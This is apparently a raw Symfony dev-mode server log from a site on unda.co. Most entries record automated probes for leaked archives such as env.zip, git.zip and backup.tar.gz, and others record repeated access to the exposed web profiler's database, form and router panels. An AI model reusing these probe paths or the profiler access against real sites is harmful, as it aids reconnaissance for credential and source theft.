[2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /slack.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /slack.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /textures.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /textures.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /pinterest.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /pinterest.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /native.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /native.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /facebook-pixel.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /facebook-pixel.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /android.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /android.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /segment.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /segment.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /flutter.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /flutter.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /godot.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /godot.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /version1.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /version1.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /facebook.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /facebook.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:30:34] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-18 06:34:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d88c3a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d88c3a","method":"GET"} []
[2025-12-18 06:34:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-18 06:39:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d7d5e3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d7d5e3?panel=request","method":"GET"} []
[2025-12-18 06:39:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-18 06:42:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0397c8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0397c8?panel=form","method":"GET"} []
[2025-12-18 06:42:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-18 06:46:43] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"f00ae0","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/f00ae0/search/results?ip=35.95.104.113&limit=10&method=GET","method":"GET"} []
[2025-12-18 06:46:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=35.95.104.113&limit=10&method=GET","method":"GET"} []
[2025-12-18 06:47:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2d0f32","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2d0f32","method":"GET"} []
[2025-12-18 06:47:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-18 06:56:40] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"POST"} []
[2025-12-18 06:58:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/latest?panel=form","method":"GET"} []
[2025-12-18 06:58:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-18 06:59:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a2a520","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a2a520?group=1&panel=db","method":"GET"} []
[2025-12-18 06:59:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
[2025-12-18 07:08:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"703e75","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/703e75?panel=twig","method":"GET"} []
[2025-12-18 07:08:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-18 07:09:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.tar.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.tar.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:09:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /git.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /git.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:09:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:09:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:09:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:09:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:09:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:09:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:09:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:09:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=162.243.172.59&limit=10","method":"GET"} []
[2025-12-18 07:09:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=162.243.172.59&limit=10","method":"GET"} []
[2025-12-18 07:17:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0397c8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0397c8?panel=exception","method":"GET"} []
[2025-12-18 07:17:30] request.INFO: Matched route "_profiler_exception_css". {"route":"_profiler_exception_css","route_parameters":{"_controller":"web_profiler.controller.exception:cssAction","token":"0397c8","_route":"_profiler_exception_css"},"request_uri":"https://www.unda.co/_profiler/0397c8/exception.css","method":"GET"} []
[2025-12-18 07:17:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-18 07:17:30] request.INFO: Matched route "_profiler_exception". {"route":"_profiler_exception","route_parameters":{"_controller":"web_profiler.controller.exception:showAction","token":"0397c8","_route":"_profiler_exception"},"request_uri":"https://www.unda.co/_profiler/0397c8/exception","method":"GET"} []
[2025-12-18 07:19:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:19:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:19:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.tar.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.tar.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:19:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /git.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /git.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:19:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:19:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:19:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:19:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:19:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:25:46] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-18 07:26:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:28:41] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-18 07:30:08] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-18 07:30:34] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-18 07:36:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c86f8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c86f8?panel=router","method":"GET"} []
[2025-12-18 07:36:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-18 07:37:36] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/?XDEBUG_SESSION_START=phpstorm","method":"GET"} []
[2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /temp.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /temp.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
